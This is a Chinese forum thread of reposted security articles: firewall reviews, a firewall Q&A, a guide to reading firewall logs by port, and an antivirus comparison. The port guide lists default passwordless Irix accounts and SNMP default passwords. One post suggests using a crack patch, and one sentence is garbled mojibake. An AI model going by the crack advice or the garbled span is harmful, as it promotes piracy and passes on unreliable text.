2.内存占用小,刚启动时6M左右,最小时1M不到。
3.可以查看正在打开的端口,正在连接网络的应用程序及连接地址、端口。
4.可以为每个程序定义规则(阻止、允许)及安全类型(浏览、文件传送、信息发送等等)。发现有程序连接时会提示,并允许选择自定义。
5.可以定义包过滤规则。默认已经定义一些。不过自定义的包过滤规则有点简单。在一条规则定义几个端口时不太方便(只能选单个或区间)。
6.本地连接的时候没有提示。比如通过代理软件上网,浏览器再通过代理软件连接的时候不会对浏览器连接网络进行提示。

二、ZoneAlarm Pro 5.5.094
1.资源占用较大,两个进程,zlclient.exe占用4M左右, vsmon.exe占用9M左右。启动还算快。和Kaspersky(卡巴斯基)杀毒软件共处相安无事,和Norton防病毒软件一起工作正常。和Sygate Personal Firewall可能有冲突。
2.默认设置还算简单,按默认设置即可阻止很多可疑连接。
3.功能强大,广告过滤,邮件过滤都不错。可对每一程序设置连接规则。
4、防火墙的专家设置项可以完成难度比较大的规则设置,设置规则还算简单,根据参考可以自定义完成。
5、升级到6.0后资源占用变得很大,启动响应比较慢。
6、对于网关的ARP保护并没有效果,同局域网机器可以使用ARP欺骗进行攻击致使无法上网。使用专家项设置IP和MAC绑定也无效果。经查ZoneAlarm 存在一个安全问题,允许未授权用户在本地局域网安全设置下连接到该防火墙保护的主机。


三、F-Secure Distributed Firewall 5.5
与天网发生冲突,安装第一次重新启动后出现蓝屏然后重启。提示信息表示与sknfw.sys文件有关。最后没有使用就删除了,可惜。


四、Outpost Firewall pro 2.7.492.416
1、与天网发生冲突,安装第一次重新启动后出现蓝屏然后重启。提示信息表示与sknfw.sys文件有关。删除sknfw.sys后再重新安装则没有出现这个问题。
2、与ZoneAlarm Pro有冲突,可以同时安装两个,不过只能运行其中一个,不然出现死机。与McAfee.VirusScan.Enterprise.v80共处没有出现什么冲突。
3、启动后只有一个进程outpost.exe,Outpost占用内存极小,刚启动时20M左右,最小化正常后只有2M左右。
4、功能强大,设置复杂。不过按其默认设置基本上可以满足上网要求。
5、可以查看正在连接网络的应用程序、连接IP、端口,系统正在打开的端口。已经发送和接收的TCP,UDP数据流量。阻止的各项统计。
6、支持插件,默认安装了active content,ads,attachment quarantine,attack detection,content,dns cache等插件。使用较多的是active content(包括pop-up windows,activeX controls,javascripts,vbscripts,cookies等的过滤设置)和ads(广告过滤,关键字列表设置)。
7、ads(广告过滤)功能不错,基本上可以过滤大部分广告图片,页面清爽不少,不过误杀还是比较多。
8、防火墙设置包括LAN设置,ICMP设置和全局RULES设置,应用程序设置。前几天设置基本上按默认设置已经满足需要,应用程序的设置已经自带了一些默认的规则(包括浏览器、ICQ、FTP等规则),可以参考这些规则进行更改。还可以对应用程序组件进行控制。
9、发现运行Robocop.exe的时候竟然没有进行拦截,看来网络执法官是有点霸道。不知道outpost为何默认就让Robocop.exe通过免检。或者是我哪里设置不对,还没找到原因。
10、发现如果边上网听歌边浏览的时候听歌时竟然有点卡,原来是下载广告过滤包后列表KEYWORD太多的缘故,使用默认的则没有出现这个问题。

五、blackice 3.6 col
1、与Outpost Firewall pro同时运行没有发生冲突,与与McAfee.VirusScan.Enterprise.v80配合还不错,没有冲突。安装后不用重新启动。
2、设置简单,基本上没有过多设置,安装后会扫描所有程序加入已知程序列表,可在列表中设置阻挡。不过修改不方便,不能从列表中删除。以后对于未知程序运行会提示。
3、占用内存比较大,运行后三个进程:blackice.exe(主程序)大概占5M左右,app.exe(应用程序保护) 大概占3M左右,blackd.exe(防火墙引擎)大概占10M左右。发现如果没有停止防火墙而退出主程序,防火墙引擎和程序保护进程并没有退出。
4、防火墙规则设置比较简单,可以通过设置IP,Port,Type来进行过滤。
5、觉得功能没有ZoneAlarm Pro强,自定义控制不是很多。对于程序访问网络的控制项少。占用资源比较多。

六、look 'n' stop 2.05p2
1、占用内存很小,见过的占用内存最小的防火墙,启动后一个进程looknstop.exe,最小后正常后只有1M左右。可以监视正在连接的IP,Port。不过如果进行配置后甚至可以监视经过的每一个数据包(包括包发送接收的物理地址、包类型、协议、包长度、数据等)
2、基于数据包过滤,所以要正确配置必须对网络连接的数据包有一些了解。有世界第一的防火墙之称,不过从技术上看只是简单的数据包过滤,因此可以自由定义。定义好了确实是可以对通行的信息全面控制。总体上看配置比较难,有几个需要注意的地方如果配置不错则连不上网。
3、可以对ARP数据进行控制,这点应该比其它防火墙功能更为强大。因此通过设置和网关的ARP接收发送后可以屏蔽Robocop的攻击。这一功能确实强大,足以局域网内的ARP欺骗攻击。试过才知道它的强大。
4、有应用程序过滤,如果安装后存在程序连接网络的时候并没有出现提示窗口的问题,这是因为其驱动安装有错,如果出现此问题要安装其提供的patch。不过应用程序过滤的设置项不多,只能对连接的IP,Port进行过滤。对于数据包类型按网络过滤规则过滤。
5、支持插件功能。不过默认没有安装什么插件。也不支持广告过滤之类的功能。
6、与outpost同时运行没有发现冲突,和macafee配合也不错。
7、如果安装过天网,还是会与sknfw.sys存在冲突而安装后蓝屏无法启动。可见天网的作用,难道它就是为了让人不能装别的防火墙。进安全模式卸载后即可解决此问题(XP-SP2),XP-SP1可能还要自己删除sknfw.sys。
8、对中文支持还不是很好,应用程序过滤中应用程序的目录名最好是E
离线深水易寒

发帖
2098
今日发帖
最后登录
2020-02-27
只看该作者 16 发表于: 2008-03-25 10:50:19
精通网络个人防火墙问与答

是网络存在之处,都不可避免地会受到诸多不安全因素的威胁,在系统中安装防火墙无疑是最明智、有效的选择。我们既然寄希望于防火墙成为个人计算机与网络之间的一道安全屏障,就一定要对防火墙的方方面面有通透的了解,才能事半功倍,达到预期效果。

  问:Windows 2003 自带的防火墙应该如何打开和关闭?

  答:可以直接在网卡属性里面设置,也可以在服务里面自己开启服务。

  问:除了Norton 8.1版能装在Windows 2003,还有哪个杀毒软件能支持Windows 2003的?

  答:McAfee VirusScan Enterprise、Kaspersky Anti-Virus for NT Server 都可以,但惟一通过Windows 2003认证的目前是趋势SPNT 5.57中文版。

  问:Windows 2000 Server装了ZoneAlarm Pro防火墙,还装了Terminal Service终端服务用来远程控制。可怎么配置都无法从远程连接终端服务,大概是ZoneAlarm Pro禁止了链接请求。应该怎样配置才能让ZoneAlarm Pro允许终端服务连接呢?

  答:开放3389端口。

  问:我在使用 Norton Internet Security 时遇到了以下问题:一是由于硬性屏蔽了来路信息,导致 Discuz? 提交安全检查无法通过,在发帖等情况下提示为未定义操作;二是由于误判断,将发帖时的 Discuz? 代码辅助提示判断为广告信息而不被执行。有何解决方法?

  答:修改 Norton 的默认配置可以避免以上问题,方法如下(以 Norton Internet Security 2003 中文版为例)。

  1. 调出“选项”窗口,选择“Norton Internet Security→Web内容→浏览站点的信息”,选择“允许”。

  2. 选择“禁止广告→配置”,取消“启用禁止广告”复选框。

  经过上述修改后,在安装有 Norton Internet Security 的机器上仍然可以顺畅地访问 Discuz! 及其他网站。

  问:单位有人使用BT大量下载东西。以前我在防火墙上封掉对外的6969端口好像很有效果,但是最近好像没啥效果了。请问有什么好的建议吗?

  答:那就使用防火墙把6999-9999端口都封了,不过,他们还会开别的,用监视看他们用哪个就封哪个。

  问:朋友的一台笔记本电脑,主要就是写写文章,上网查点东西,不玩游戏,其他东西做的也不多。3月份重装系统安装了ZoneAlarm防火墙后,就开始出现:如果ADSL网络没有流量(就是不访问点什么,停在那里不动)大概过10分钟就会断线,然后机器重新拨号连接!我检查半天,就是找不到有什么问题,请问可能会是什么原因?

  答:通常来说,这类防火墙都有当网络闲置时自动断线的功能,而且,一般来说,这个功能默认情况下是启用的,解决这位朋友遇到的问题办法其实很简单,只需去掉这个功能即可。

  问:装Kerio Personal Firewall 2.1.5防火墙的这台机器是直接拨号上网?ADSL?,两台机器是Hub相连的,通过Windows XP的那个共享来一起上网。现在装了防火墙之后,另一台就不能上网了,不论做什么都不行。请问大家,要创建些怎样的规则才行呢?

  答:选择“管理→防火墙→高级→Microsoft网络”,选中“允许其他用户访问我的共享文件夹和打印机”即可。

  问:我现在QQ每发送一个消息,Norton都会进行病毒扫描。在内存驻留Savscan.exe这个程序,在后台强行关闭不了这个文件,一关闭就会出现提示,但是仍然继续扫描,好像是扫描msg???.db的一个文件。扫描过程使我用QQ速度很慢,而且CPU占用率很高,请问我如何关闭Norton对QQ的病毒扫描?

  答:在Norton的程序选项中,选择“系统→自动防护→排除”,在右侧列表中将QQ程序添加至要“排除的项目”。再选择“其它→威胁类别→排除”,同样添加QQ程序至右侧列表中
离线深水易寒

发帖
2098
今日发帖
最后登录
2020-02-27
只看该作者 17 发表于: 2008-03-25 10:50:43
精解解读防火墙记录

本文将向你解释你在防火墙的记录(Log)中看到了什么?尤其是那些端口是什么意思?你将能利用这些信息做出判断:我是否受到了Hacker的攻击?他/她到底想要干什么?本文既适用于维护企业级防火墙的安全专家,又适用于使用个人防火墙的家庭用户。

  现在个人防火墙开始流行起来,很多网友一旦看到报警就以为受到某种攻击,其实大多数情况并非如此。

  一、目标端口ZZZZ是什么意思

  所有穿过防火墙的通讯都是连接的一个部分。一个连接包含一对相互“交谈”的IP地址以及一对与IP地址对应的端口。目标端口通常意味着正被连接的某种服务。当防火墙阻挡(block)某个连接时,它会将目标端口“记录在案”(logfile)。这节将描述这些端口的意义。

  端口可分为3大类:

  1) 公认端口(Well Known Ports):从0到1023,它们紧密绑定于一些服务。通常这些端口的通讯明确表明了某种服务的协议。例如:80端口实际上总是HTTP通讯。

  2) 注册端口(Registered Ports):从1024到49151。它们松散地绑定于一些服务。也就是说有许多服务绑定于这些端口,这些端口同样用于许多其它目的。例如:许多系统处理动态端口从1024左右开始。

  3) 动态和/或私有端口(Dynamic and/or Private Ports):从49152到65535。理论上,不应为服务分配这些端口。实际上,机器通常从1024起分配动态端口。但也有例外:SUN的RPC端口从32768开始。

  从哪里获得更全面的端口信息:

  1.ftp://ftp.isi.edu/in-notes/iana/assignments/port-numbers

  "Assigned Numbers" RFC,端口分配的官方来源。

  2.http://advice.networkice.com/advice/Exploits/Ports/

  端口数据库,包含许多系统弱点的端口。

  3./etc/services

  UNIX 系统中文件/etc/services包含通常使用的UNIX端口分配列表。Windows NT中该文件位于%systemroot%/system32/drivers/etc/services。

  4.http://www.con.wesleyan.edu/~triemer/network/docservs.html

  特定的协议与端口。

  5.http://www.chebucto.ns.ca/~rakerman/trojan-port-table.html

  描述了许多端口。

  6.http://www.tlsecurity.com/trojanh.htm

  TLSecurity的Trojan端口列表。与其它人的收藏不同,作者检验了其中的所有端口。

  7.http://www.simovits.com/nyheter9902.html

  Trojan Horse 探测。

 二、通常对于防火墙的TCP/UDP端口扫描有哪些?

  本节讲述通常TCP/UDP端口扫描在防火墙记录中的信息。记住:并不存在所谓ICMP端口。如果你对解读ICMP数据感兴趣,请参看本文的其它部分。

  0 通常用于分析操作系统。这一方法能够工作是因为在一些系统中“0”是无效端口,当你试图使用一种通常的闭合端口连接它时将产生不同的结果。一种典型的扫描:使用IP地址为0.0.0.0,设置ACK位并在以太网层广播。

  1 tcpmux 这显示有人在寻找SGI Irix机器。Irix是实现tcpmux的主要提供者,缺省情况下tcpmux在这种系统中被打开。Iris机器在发布时含有几个缺省的无密码的帐户,如lp, guest, uucp, nuucp, demos, tutor, diag, EZsetup, OutOfBox, 和4Dgifts。许多管理员安装后忘记删除这些帐户。因此Hacker们在Internet上搜索tcpmux并利用这些帐户。

  7 Echo 你能看到许多人们搜索Fraggle放大器时,发送到x.x.x.0和x.x.x.255的信息。

  常见的一种DoS攻击是echo循环(echo-loop),攻击者伪造从一个机器发送到另一个机器的UDP数据包,而两个机器分别以它们最快的方式回应这些数据包。(参见Chargen)

  另一种东西是由DoubleClick在词端口建立的TCP连接。有一种产品叫做“Resonate Global Dispatch”,它与DNS的这一端口连接以确定最近的路由。

  Harvest/squid cache将从3130端口发送UDP echo:“如果将cache的source_ping on选项打开,它将对原始主机的UDP echo端口回应一个HIT reply。”这将会产生许多这类数据包。

  11 sysstat 这是一种UNIX服务,它会列出机器上所有正在运行的进程以及是什么启动了这些进程。这为入侵者提供了许多信息而威胁机器的安全,如暴露已知某些弱点或帐户的程序。这与UNIX系统中“ps”命令的结果相似

  再说一遍:ICMP没有端口,ICMP port 11通常是ICMP type=11

  19 chargen 这是一种仅仅发送字符的服务。UDP版本将会在收到UDP包后回应含有垃圾字符的包。TCP连接时,会发送含有垃圾字符的数据流知道连接关闭。Hacker利用IP欺骗可以发动DoS攻击。伪造两个chargen服务器之间的UDP包。由于服务器企图回应两个服务器之间的无限的往返数据通讯一个chargen和echo将导致服务器过载。同样fraggle DoS攻击向目标地址的这个端口广播一个带有伪造受害者IP的数据包,受害者为了回应这些数据而过载。

  21 ftp 最常见的攻击者用于寻找打开“anonymous”的ftp服务器的方法。这些服务器带有可读写的目录。Hackers或Crackers 利用这些服务器作为传送warez (私有程序) 和pr0n(故意拼错词而避免被搜索引擎分类)的节点。

  22 ssh PcAnywhere建立TCP和这一端口的连接可能是为了寻找ssh。这一服务有许多弱点。如果配置成特定的模式,许多使用RSAREF库的版本有不少漏洞。(建议在其它端口运行ssh)

  还应该注意的是ssh工具包带有一个称为make-ssh-known-hosts的程序。它会扫描整个域的ssh主机。你有时会被使用这一程序的人无意中扫描到。

  UDP(而不是TCP)与另一端的5632端口相连意味着存在搜索pcAnywhere的扫描。5632(十六进制的0x1600)位交换后是0x0016(使进制的22)。

  23 Telnet 入侵者在搜索远程登陆UNIX的服务。大多数情况下入侵者扫描这一端口是为了找到机器运行的操作系统。此外使用其它技术,入侵者会找到密码。

  25 smtp 攻击者(spammer)寻找SMTP服务器是为了传递他们的spam。入侵者的帐户总被关闭,他们需要拨号连接到高带宽的e-mail服务器上,将简单的信息传递到不同的地址。SMTP服务器(尤其是sendmail)是进入系统的最常用方法之一,因为它们必须完整的暴露于Internet且邮件的路由是复杂的(暴露+复杂=弱点)。

  53 DNS Hacker或crackers可能是试图进行区域传递(TCP),欺骗DNS(UDP)或隐藏其它通讯。因此防火墙常常过滤或记录53端口。

  需要注意的是你常会看到53端口做为UDP源端口。不稳定的防火墙通常允许这种通讯并假设这是对DNS查询的回复。Hacker常使用这种方法穿透防火墙。

  67和68 Bootp和DHCP UDP上的Bootp/DHCP:通过DSL和cable-modem的防火墙常会看见大量发送到广播地址255.255.255.255的数据。这些机器在向DHCP服务器请求一个地址分配。Hacker常进入它们分配一个地址把自己作为局部路由器而发起大量的“中间人”(man-in-middle)攻击。客户端向68端口(bootps)广播请求配置,服务器向67端口(bootpc)广播回应请求。这种回应使用广播是因为客户端还不知道可以发送的IP地址。

  69 TFTP(UDP) 许多服务器与bootp一起提供这项服务,便于从系统下载启动代码。但是它们常常错误配置而从系统提供任何文件,如密码文件。它们也可用于向系统写入文件。

  79 finger Hacker用于获得用户信息,查询操作系统,探测已知的缓冲区溢出错误,回应从自己机器到其它机器finger扫描。

  98 linuxconf 这个程序提供linux boxen的简单管理。通过整合的HTTP服务器在98端口提供基于Web界面的服务。它已发现有许多安全问题。一些版本setuid root,信任局域网,在/tmp下建立Internet可访问的文件,LANG环境变量有缓冲区溢出。此外因为它包含整合的服务器,许多典型的HTTP漏洞可能存在(缓冲区溢出,历遍目录等)

  109 POP2 并不象POP3那样有名,但许多服务器同时提供两种服务(向后兼容)。在同一个服务器上POP3的漏洞在POP2中同样存在。

  110 POP3 用于客户端访问服务器端的邮件服务。POP3服务有许多公认的弱点。关于用户名和密码交换缓冲区溢出的弱点至少有20个(这意味着Hacker可以在真正登陆前进入系统)。成功登陆后还有其它缓冲区溢出错误。

111 sunrpc portmap rpcbind Sun RPC PortMapper/RPCBIND。访问portmapper是扫描系统查看允许哪些RPC服务的最早的一步。常见RPC服务有:rpc.mountd, NFS, rpc.statd, rpc.csmd, rpc.ttybd, amd等。入侵者发现了允许的RPC服务将转向提供服务的特定端口测试漏洞。

  记住一定要记录线路中的daemon, IDS, 或sniffer,你可以发现入侵者正使用什么程序访问以便发现到底发生了什么。

  113 Ident auth 这是一个许多机器上运行的协议,用于鉴别TCP连接的用户。使用标准的这种服务可以获得许多机器的信息(会被Hacker利用)。但是它可作为许多服务的记录器,尤其是FTP, POP, IMAP, SMTP和IRC等服务。通常如果有许多客户通过防火墙访问这些服务,你将会看到许多这个端口的连接请求。记住,如果你阻断这个端口客户端会感觉到在防火墙另一边与e-mail服务器的缓慢连接。许多防火墙支持在TCP连接的阻断过程中发回RST,着将回停止这一缓慢的连接。

  119 NNTP news 新闻组传输协议,承载USENET通讯。当你链接到诸如:news://comp.security.firewalls/. 的地址时通常使用这个端口。这个端口的连接企图通常是人们在寻找USENET服务器。多数ISP限制只有他们的客户才能访问他们的新闻组服务器。打开新闻组服务器将允许发/读任何人的帖子,访问被限制的新闻组服务器,匿名发帖或发送spam。

  135 oc-serv MS RPC end-point mapper Microsoft在这个端口运行DCE RPC end-point mapper为它的DCOM服务。这与UNIX 111端口的功能很相似。使用DCOM和/或RPC的服务利用机器上的end-point mapper注册它们的位置。远端客户连接到机器时,它们查询end-point mapper找到服务的位置。同样Hacker扫描机器的这个端口是为了找到诸如:这个机器上运行Exchange Server吗?是什么版本?

  这个端口除了被用来查询服务(如使用epdump)还可以被用于直接攻击。有一些DoS攻击直接针对这个端口。

  137 NetBIOS name service nbtstat (UDP) 这是防火墙管理员最常见的信息,请仔细阅读文章后面的NetBIOS一节

  139 NetBIOS File and Print Sharing 通过这个端口进入的连接试图获得NetBIOS/SMB服务。这个协议被用于Windows“文件和打印机共享”和SAMBA。在Internet上共享自己的硬盘是可能是最常见的问题。

  大量针对这一端口始于1999,后来逐渐变少。2000年又有回升。一些vbs(IE5 VisualBasic scripting)开始将它们自己拷贝到这个端口,试图在这个端口繁殖。

  143 IMAP 和上面POP3的安全问题一样,许多IMAP服务器有缓冲区溢出漏洞运行登陆过程中进入。记住:一种Linux蠕虫(admw0rm)会通过这个端口繁殖,因此许多这个端口的扫描来自不知情的已被感染的用户。当RadHat在他们的Linux发布版本中默认允许IMAP后,这些漏洞变得流行起来。Morris蠕虫以后这还是第一次广泛传播的蠕虫。

  这一端口还被用于IMAP2,但并不流行。

  已有一些报道发现有些0到143端口的攻击源于脚本。

  161 SNMP(UDP) 入侵者常探测的端口。SNMP允许远程管理设备。所有配置和运行信息都储存在数据库中,通过SNMP客获得这些信息。许多管理员错误配置将它们暴露于Internet。Crackers将试图使用缺省的密码“public”“private”访问系统。他们可能会试验所有可能的组合。

  SNMP包可能会被错误的指向你的网络。Windows机器常会因为错误配置将HP JetDirect remote management软件使用SNMP。HP OBJECT IDENTIFIER将收到SNMP包。新版的Win98使用SNMP解析域名,你会看见这种包在子网内广播(cable modem, DSL)查询sysName和其它信息。

  162 SNMP trap 可能是由于错误配置

  177 xdmcp 许多Hacker通过它访问X-Windows控制台, 它同时需要打开6000端口。

  513 rwho 可能是从使用cable modem或DSL登陆到的子网中的UNIX机器发出的广播。这些人为Hacker进入他们的系统提供了很有趣的信息。

  553 CORBA IIOP (UDP) 如果你使用cable modem或DSL VLAN,你将会看到这个端口的广播。CORBA是一种面向对象的RPC(remote procedure call)系统。Hacker会利用这些信息进入系统。

  600 Pcserver backdoor 请查看1524端口

  一些玩script的孩子认为他们通过修改ingreslock和pcserver文件已经完全攻破了系统-- Alan J. Rosenthal.

  635 mountd Linux的mountd Bug。这是人们扫描的一个流行的Bug。大多数对这个端口的扫描是基于UDP的,但基于TCP的mountd有所增加(mountd同时运行于两个端口)。记住,mountd可运行于任何端口(到底在哪个端口,需要在端口111做portmap查询),只是Linux默认为635端口,就象NFS通常运行于2049端口。

  1024 许多人问这个端口是干什么的。它是动态端口的开始。许多程序并不在乎用哪个端口连接网络,它们请求操作系统为它们分配“下一个闲置端口”。基于这一点分配从端口1024开始。这意味着第一个向系统请求分配动态端口的程序将被分配端口1024。为了验证这一点,你可以重启机器,打开Telnet,再打开一个窗口运行“natstat -a”,你将会看到Telnet被分配1024端口。请求的程序越多,动态端口也越多。操作系统分配的端口将逐渐变大。再来一遍,当你浏览Web页时用“netstat”查看,每个Web页需要一个新端口。
离线深水易寒

发帖
2098
今日发帖
最后登录
2020-02-27
只看该作者 18 发表于: 2008-03-25 10:51:25
推荐:绝对值得一看的杀毒软件和防火墙评论

这是我从别的网站上看到的,我个人认为这个评论写的很有参考价值,因此转贴过来与大家分享一下!

最近经常有网友发消息问我,到底哪个哪个杀毒软件最厉害,哪个杀毒软件售价最高?呵呵,诸如此类的问题老实说我也无法做出肯定的答复。我就随便谈一些我个人的见解。世界上公认的比较著名的杀毒软件有卡巴斯基,F-SECURE,MACFEE,诺顿,趋势科技,熊猫,NOD32,AVG,F-PORT等等。其中卡巴,macfee,诺顿又被誉为世界三大杀毒软件!每个杀毒软件都有自身的优势,当然也有不足之处!

比如卡巴斯基的杀毒能力确实很强,对的起排名世界第一的称号,但是监控方面却存在不足,而且在内存占用方面始终令人头疼。Macfee的系统监控恰恰是做的最好的。NOD32的扫毒速度最快,内存占用方面最少,全球获奖无数,因而成为微软御用4年的杀毒软件也绝非空穴来风。熊猫可能大家以为是中国的,其实也是洋货啦,杀毒理念和模块最先进,可惜老是提示你要重新激活,所以破解的不大完美!诺顿大家很熟悉,老实说诺顿的广告宣传还真是不错的,但是大家注意,别看广告,看疗效!当诺顿屡次告诉你XX病毒被隔离,无法清除时,你是否感到厌倦了呢?当然诺顿企业版要比个人版本的杀毒能力更强悍,建议大家使用9.0的,最新10.0占用资源有点大,不算完美。F-SECURE可能知道的人很少,别说用的人了,呵呵。我自己现在用的杀软就是这款,其实这款杀毒软件名气是相当响的。来自芬兰的杀毒软件,集合AVP,LIBRA,ORION,DRACO四套杀毒引擎,其中一个就是Kaspersky的杀毒内核,而且青出于蓝胜于蓝,个人感觉杀毒效率比Kaspersky要好,对网络流行病毒尤其有效。在《PC Utilites》评测中超过Kaspersky名列第一。该软件采用分布式防火墙技术。f-secure 曾经超过Kaspersky,排名第一,但后来Kaspersky增加了扩展病毒库,反超f-secure 。鉴于普通用户用不到扩展病毒库,因此f-secure还是普通用户很不错的一个选择。所以我用下来的感觉就是F-SECURE的综合能力可以排第一名!但是这个软件也有不足,就是进程太多,要近15个进程,呵呵,谁叫它有四套杀毒引擎呢?不过也够安全吧。进程虽多,却一点不觉得卡!

在此不得不提起国产杀毒软件,国产杀毒软件也有很多用户群,个性化的界面也赢得了很多用户的青睐。比如瑞星的那个小狮子就蛮可爱的,做个桌面宠物也不错。但是有很多人会说,国产的技术不行,靠不住的。呵呵,其实我倒不这么认为!国产杀毒软件我最喜欢的就是KV2005,江民的东西还是老牌子,杀毒监控实力不俗。瑞星和金山的起步晚一些,有些地方做的还是不够理想,但毕竟是在不断进步,希望能越做越好,给中国人也争光一把,哈哈。也许有人会说实际的杀毒能力说明一切,金山,瑞星和卡巴比就是垃圾等等。呵呵,那你就错了,如果说卡巴能杀掉这个病毒,金山杀不掉,就说明卡巴强于金山?反过来金山能杀掉这个病毒,卡巴无法槌鲈趺此悖拷鹕角坑诳ò停亢芗虻ザ钜桓隼?樱?蠹铱梢匀ネ?舷略匾桓?005年病毒测试包样本,是个压缩包文件,里面大概有26个病毒样本,试试你的杀软吧,呵呵,江民,金山,瑞星兵不血刃的杀光了所有病毒,再看看卡巴啊,这次傻了吧,所以说每个杀毒软件都有自己的长处,不能一拍子否定。

还有的朋友问我一个杀毒软件保险伐,要不要装两个来个双保险,呵呵,对于这个我觉得是可行的,但是前提是你对杀毒软件的各项设置要比较了解而且自己的电脑配置要高档点,否则不是系统容易崩溃就是电脑被两个杀毒软件拖垮的。比较典型的例子就是卡巴斯基+KV2005的组合,很显然卡巴系统监控的不足由KV2005来弥补。卡巴只负责杀毒即可了。但是这个豪华组合要牺牲很多内存,你电脑够劲的话可以试试。另外卡巴加NOD32也是不错的搭配,NOD32查毒和监控方面都不错,而且查毒速度奇快,内存占用很小,这样你可以用NOD32进行查毒,大家都知道卡巴的查毒速度是很慢的,因为病毒库多啊,每个文件都要那13W病毒库去套,能不慢嘛!

有的朋友关心哪个杀毒软件病毒库多哪个就牛,呵呵,大家都以为卡巴病毒库很多是伐,现在大概13万4千左右吧,但是面对罗马尼亚的杀软BitDefender Professional近20W的病毒库,卡巴一边凉快去吧。所以BitDefender Professional在2005年一些网站的测试中取得过第一名的成绩。但是病毒库多并不能说明问题,实际杀毒能力BitDefender Professional并没有比卡巴更好,所以这个也是大家理解的误区!有人认为卡巴病毒库升级极其迅速所以最牛,虽然卡巴每小时都有升级,很频繁,但是很多病毒库都非最终版,也就是很容易出现误报现象,所以建议大家到周末的时候再升级自己的卡巴,因为周末是卡巴整理一周病毒库,删除错误病毒库的时候。 ?

 还有有的朋友认为杀毒软件只要杀毒厉害就是一流的,其实这种观点我认为也不对,比如macfee,它其实杀毒并没有怎么厉害,肯定没有卡巴那么野蛮,但是为什么它也拥有广泛的用户群,有很好的口碑,很显然macfee的监控做的很完美,可以说滴水不漏,监控这么好的杀软我想杀毒能力稍微弱点又有何妨呢?因为第一道防线病毒都无法逾越的话不就是最大的成功么?反观卡巴杀毒是厉害,但是恰恰是由于它监控的不足,使病毒可以入侵,但鉴于杀毒能力很牛,所以第二道防线病毒就通不过了,这样逆向思考或许就能想通了!

另外一个大家关心的问题就是装了杀毒软件是否还要加装防火墙的问题,哪款防火墙最好等等!呵呵,其实个人感觉XP SP2自带的防火墙也已经蛮不错了,够用了。如果大家真的有要求的话,我个人认为可以这么做:

1,如果你选择安装的是F-SECURE client security的话,那么这款杀毒软件自带防火墙程序,而且这个防火墙排名欧洲第一,绝对可以了已经。这样你就可以不必再另外安装了,这个选择比较便捷!

2,ZA,也就是ZONEALARM,用户群也蛮多额,ZA功能确实比较强大,但是对普通用户而言还是比较难上手,而且过于严格的规则可能导致上某些论坛出错,而且最新的ZA版本与卡巴斯基有严重冲突,所以卡巴的用户如果要安装ZA防火墙的话还是悠着点,哈哈。实在想尝试的话可以考虑安装5.5版本的,这个稳定。
'
3,OP,也就是outpost,口碑很好,用户对其评价很高,号称世界排名第二的东东,对于广告拦截很有效果,反黑能力也很强悍,网上找个破解补丁可以使用10年,但是可能占用系统资源多一点,配置不高的用户可能上网会感觉有点延迟。而且这款防火墙比较专业,上网过滤的东西也很多,很多网站的图片也被过滤掉,用户可能看的不习惯,所以大家自己看着办吧。

4,Tiny personal firewall pro,tiny防火墙是我用过的防火墙里面感觉技术最为先进的一款,貌似是国外军方防火墙,呵呵。Tiny的规则相当严格和复杂,对于一些刚上手的朋友而言肯定吃不消的,而且tiny防火墙与卡巴的网页扫描功能有冲突,所以这款防火墙是超级强悍,东西绝对是一流的,不怕麻烦的朋友可以尝试安装。

5,Lns,也就是传说中的look'n'stop,号称世界第一的顶级防火墙,只有600多KB,容量很小,系统资源占的很少,但是功能极其强大,只可惜设置超级复杂,很难上手,一般用户还是选择放弃吧,呵呵,虽然有一些别人编订的规则包,但还是不大适合我们使用。

6,天网,相信用的人满天飞,世界排名未知,呵呵,其实是根本埃不到边。天网可以算是一款入门级别的防火墙,和上述5款防火墙最大区别是非常容易上手,根本不需要设置什么东西,拿来就用!普通用户如果怕不装防火墙感觉不安,但又怕设置麻烦的话,干脆就用用天网算了。

国产的瑞星或者天网都会标榜自己的防火墙规则是多么多么丰富,貌似搞的很牛的样子,其实恰恰相反,规则越多防火墙性能越差,比如瑞星几乎天天更新规则,天网更是广告做到声称自己有1000条规则库文件,每次上网,天网防火墙不断闪动红色感叹号,报告XX用户试图连接本机XX端口,该包已被拦截,这个是不是增加你的心里安慰呢?每时每刻都在拦截信息,哪有这么多黑客会盯着你,天网这样做好像有点夸大其词了。其实有这么多规则顶用么?规则一多上网速度就越慢,每个探测端口的信息防火墙就要用近千条规则去衡量,这不傻掉啊!真正一流的防火墙并不需要超级多的规则,也不需要频繁更新,就如卡巴防火墙,虽然界面极其简单,更新也不快,但是一个隐藏模式就足以令国产的瑞星和天网闭嘴!

很多人热衷于做网上安全测试,我也做过几次,后来发现也不能说明什么问题,加装一流防火墙和不装防火墙就一定有本质区别?就拿诺顿安全测试来看,只用XP SP2自带防火墙就可以轻松通过所有测试,全部显示安全。呵呵,装个ZA也是安全,那到底装不装呢?所以大家也不要迷信这些测试网站。自己认为怎么顺手就怎么用好了!

乱七八糟说了这么多,也不知道大家有没有耐心看完额。以上涉及的杀毒软件或者防火墙本人每个都使用过,所以写的内容也是真实的使用体会。大家随便看看吧。如果各位图个方便,不想装其他设置繁琐的防火墙,但又希望系统有最大限度的安全保障的话,可以考虑使用国外的F-Secure Anti-Virus Client Security或者BitDefender Professional,都是杀毒软件+防火墙的组合装。个人更看好F-Secure Anti-Virus Client Security,集合AVP,LIBRA,ORION,DRACO四套杀毒引擎+内置防火墙+反间谍监控程序,可以说各方面功能都比较均衡实在,怕麻烦的朋友们不仿可以考虑一下。但是这个软件只有英文原版的,但是我想英文界面也并非那么令人望而却步吧。

其实对于杀毒软件除了国内的,国外的杀软建议大家都使用英文原版的,那些汉化内核的版本最好别用,bug太多,除了真正出过简体中文版本的,不过我个人还是不喜欢,呵呵。

另外我需要强调一点的就是卡巴其实并不适合每个人,大家应该依照自己的实际情况装杀毒软件,卡巴占用系统资源更象暴发户,所以很容易拖垮电脑,如果自己电脑配置本身就不高,CPU处理器能力也不强,或者内存就256MB那么点,我想还是算了吧,毕竟装了以后你才知道什么叫慢,开了个卡巴,除了得到我系统应该很安全了这样的心里安慰,其他事情都不能做,开个大程序就卡,玩个游戏载入要老半天,这又何苦呢?与其这样,我宁可欣赏飘哥的做法,撒杀毒软件也不装,就搞个防火墙玩玩,毕竟节省资源啊!敢于裸奔电脑上网的用户我就更服帖了!

我写这篇文章就是希望大家不要盲目跟风,卡巴是好卡巴是比较牛,但不是意味着就要一窝蜂都去装卡巴,何必呢,天下杀毒软件如此之多,何必单恋他一个呢?大家说对伐?
离线深水易寒

发帖
2098
今日发帖
